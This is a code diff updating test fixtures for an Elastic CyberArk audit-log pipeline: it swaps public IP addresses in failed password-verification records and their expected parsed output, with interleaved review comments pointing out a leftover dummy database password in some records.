67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T16:56:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:56:29\n 2021-03-15T16:56:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:56:29","IsoTimestamp":"2021-03-15T16:56:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827245"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:01:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:01:07\n 2021-03-15T17:01:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:01:07","IsoTimestamp":"2021-03-15T17:01:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827554"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"mariadb"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:05:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:05:47\n 2021-03-15T17:05:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:05:47","IsoTimestamp":"2021-03-15T17:05:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827864"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} 
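Review bot: The unchanged third context record of this hunk still carries a full ODBC connection string in the `DSN` CAProperty, `DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test`, so while this commit is already scrubbing fixture values to the supported IP subset it is worth confirming in the same pass that the `PWD=` portion is intended in a committed fixture and that the matching expected-output file does not surface it verbatim in an indexed field. The five added records map the old pair 35.192.121.42/34.66.114.180 to 67.43.156.14/67.43.156.15 one-to-one, so the first two records keeping `67.43.156.14` in the File/Object name while `Address`, `LogonDomain` and the error text use `67.43.156.15` looks deliberate rather than a typo; a one-line comment in the PR description saying so would save the next reader from re-deriving it. The `@@ -11,5 +11,5 @@` hunk that follows is cut off at the end of this view and is not reviewed here.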
@@ -11,5 +11,5 @@ <7>1 2021-03-15T17:33:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:33:17\n 2021-03-15T17:33:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:33:17","IsoTimestamp":"2021-03-15T17:33:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829597"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:38:27\n 2021-03-15T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:38:27","IsoTimestamp":"2021-03-15T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829907"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T18:00:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:00:07\n 2021-03-15T18:00:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:00:07","IsoTimestamp":"2021-03-15T18:00:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615831206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} -<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json index df135761b1f..b2aec9f1215 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json @@ -7,22 +7,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { 
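Review bot: The three context records this hunk leaves untouched still carry a database connection string with a cleartext password — `Password=1234` in the `Address` CAProperty and `Password\\=1234` in `ExtraDetails` of the 18:00:07Z record, and `PWD=1234` in the `DSN` property of the hunk above — while the commit scrubs only the public IPs in the two WinDomain records it rewrites. These look like dummy lab values, but since the fixture is committed and indexed verbatim by the pipeline under test, replacing them with an obviously placeholder value in the same pass would be consistent with what is done for the addresses. The sample also shows that CyberArk can emit a full DSN including the secret inside `Address`/`ExtraDetails`; if the pipeline does not already redact or tag those fields, keeping such a record in the fixture and asserting on its expected output would make the exposure visible in review rather than silently indexed.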
@@ -45,7 +34,7 @@
 },
 "@timestamp": "2021-03-15T13:19:58.000Z",
 "file": {
- "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart"
+ "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart"
 },
 "ecs": {
 "version": "1.12.0"
